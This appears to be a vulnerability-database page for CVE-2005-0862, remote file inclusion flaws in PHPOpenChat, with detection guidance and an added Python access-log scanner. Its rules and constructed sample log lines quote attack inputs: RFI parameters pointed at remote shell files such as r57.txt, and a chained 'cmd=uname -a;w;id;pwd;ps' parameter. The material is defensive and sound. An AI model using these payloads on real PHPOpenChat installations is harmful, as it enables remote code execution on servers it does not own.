CVE-2005-0862
published 2005-05-02


Priority: P2, 66 (high)
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploited in the wild (ITW exploit; VulnCheck KEV)
EPSS: 10.92% (95.3rd percentile)
Multiple PHP remote file inclusion vulnerabilities in PHPOpenChat 3.0.1 and earlier allow remote attackers to execute arbitrary PHP code via the phpbb_root_path parameter to (1) poc_loginform.php or (2) phpbb/poc.php, the poc_root_path parameter to (3) phpbb/poc.php, (4) phpnuke/ENGLISH_poc.php, (5) phpnuke/poc.php, or (6) yabbse/poc.php, or (7) the sourcedir parameter to yabbse/poc.php.

Affected (2 ranges)

Vendor | Product | Version range | Fixed in
phpopenchat | phpopenchat | (not listed) | (not listed)
phpopenchat | phpopenchat | (not listed) | (not listed)

Detection & IOCs (extracted from sources)

  • path: /phpopenchat/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php
  • path: /phpopenchat/contrib/phpnuke/ENGLISH_poc.php
  • path: /phpopenchat/contrib/phpnuke/poc.php
  • path: /phpopenchat/contrib/yabbse/poc.php
  • Monitor HTTP requests containing 'phpbb_root_path', 'poc_root_path', or 'sourcedir' parameters with remote HTTP/HTTPS URLs as values — a hallmark of PHP remote file inclusion exploitation against PHPOpenChat.
  • Alert on inbound GET/POST requests to paths matching */contrib/phpbb/*/poc_loginform.php, */contrib/phpnuke/poc.php, */contrib/phpnuke/ENGLISH_poc.php, or */contrib/yabbse/poc.php with any parameter value beginning with 'http://' or 'https://'.
  • Presence of a 'cmd' parameter alongside the RFI parameter (e.g., &cmd=uname%20-a;w;id;pwd;ps) indicates active exploitation with OS command injection chained to the file inclusion.
  • The RFI attack requires PHP's 'allow_url_include' (or 'allow_url_fopen' in PHP versions before 5.2, where that single directive governed URL includes) to be enabled. Installations with these directives disabled are not exploitable via this vector.
  • All affected files reside under the 'contrib/' directory tree; deployments that do not expose, or have removed, the contrib/ directory reduce their attack surface significantly.
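The three detection bullets above are easy to state and easy to get wrong in practice (percent-encoded URLs, the `?` trick in the include target, `cmd` chained onto the same request). The following is an added example, not code from this page or from the PHPOpenChat project, that implements those rules as a scanner over Apache/nginx combined-format access log lines. The parameter names and affected script paths come from the CVE text; the sample log lines, IP addresses and remote filenames are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameter names and script paths taken from the CVE-2005-0862 description.
RFI_PARAMS = {"phpbb_root_path", "poc_root_path", "sourcedir"}
AFFECTED_PATH = re.compile(
    r"/contrib/(?:"
    r"phpbb/(?:[^/]+/)*poc(?:_loginform)?\.php"  # phpbb/poc.php, phpbb/.../poc_loginform.php
    r"|phpnuke/(?:ENGLISH_)?poc\.php"
    r"|yabbse/poc\.php)$"
)
# A remote include target starts with a URL scheme. Values are compared after
# percent-decoding (parse_qsl does that), so http%3A%2F%2F... is caught too.
REMOTE_URL = re.compile(r"^https?://", re.IGNORECASE)

# Apache/nginx combined log format; only the fields we need are captured.
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def analyze_request(target: str):
    """Apply the page's three rules to one request target (path + query string).

    Returns None for benign requests, otherwise a dict naming the rules that
    fired. Only GET query strings are visible in access logs; POST bodies are not.
    """
    parts = urlsplit(target)
    params = parse_qsl(parts.query, keep_blank_values=True)
    remote = [(k, v) for k, v in params if REMOTE_URL.match(v)]
    if not remote:
        return None
    rules = []
    # Rule 1: a known RFI parameter carrying a remote URL, on any path.
    if any(k in RFI_PARAMS for k, _ in remote):
        rules.append("rfi-parameter")
    # Rule 2: an affected contrib/ script with any parameter set to a remote URL.
    if AFFECTED_PATH.search(parts.path):
        rules.append("affected-path")
    if not rules:
        return None
    # Rule 3: a 'cmd' parameter next to the include means a fetched shell is
    # being driven; treat it as active exploitation rather than a probe.
    cmd = next((v for k, v in params if k == "cmd"), None)
    if cmd is not None:
        rules.append("chained-cmd")
    return {
        "path": parts.path,
        "remote_params": remote,
        "rules": rules,
        "cmd": cmd,
        "verdict": "exploitation" if cmd is not None else "attempt",
    }


def scan_log(lines):
    """Run analyze_request over raw log lines; return findings with ip/ts/method."""
    findings = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not combined-log format; count these separately in production
        f = analyze_request(m.group("target"))
        if f:
            f.update(ip=m.group("ip"), ts=m.group("ts"), method=m.group("method"),
                     status=int(m.group("status")))
            findings.append(f)
    return findings


# Constructed sample lines (documentation-range IPs, invented remote filenames).
SAMPLE_LOG = [
    '203.0.113.7 - - [02/May/2005:10:14:03 +0000] "GET /phpopenchat/contrib/yabbse/poc.php'
    '?sourcedir=http://203.0.113.99/r57.txt?&cmd=uname%20-a;w;id;pwd;ps HTTP/1.0" 200 4096',
    '198.51.100.5 - - [02/May/2005:10:15:41 +0000] "GET /phpopenchat/contrib/phpbb/alternative2/'
    'phpBB2_root/poc_loginform.php?phpbb_root_path=http%3A%2F%2F198.51.100.200%2Fs.txt%3F HTTP/1.1" 200 1203',
    '192.0.2.44 - - [02/May/2005:10:16:02 +0000] "GET /phpopenchat/contrib/phpnuke/poc.php'
    '?poc_root_path=../ HTTP/1.1" 200 887',
    '192.0.2.45 - - [02/May/2005:10:17:30 +0000] "GET /forum/index.php'
    '?phpbb_root_path=https://192.0.2.250/x.txt HTTP/1.1" 404 512',
    '192.0.2.46 - - [02/May/2005:10:18:00 +0000] "GET /phpopenchat/index.php'
    '?url=http://example.org/ HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']:14s} {f['verdict']:12s} {f['path']} "
              f"rules={','.join(f['rules'])} cmd={f['cmd']!r}")
```

Of the five constructed lines, three fire: the first on all three rules (remote `sourcedir` on an affected path with a chained `cmd`), the second on the percent-encoded `phpbb_root_path`, the fourth on the parameter rule alone even though `/forum/index.php` is not a PHPOpenChat script (the page's first bullet is parameter-based, not path-based). A local path such as `poc_root_path=../` is not a remote include and is deliberately left out of scope here. A hit is an attempt, not proof of compromise: whether the include actually executed depends on `allow_url_include` / `allow_url_fopen` on the target, so pair this with the configuration check from the bullet above before escalating.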

CVSS provenance

NVD: CVSS v2.0 7.5 HIGH (AV:N/AC:L/Au:N/C:P/I:P/A:P)
VulnCheck: 7.5 HIGH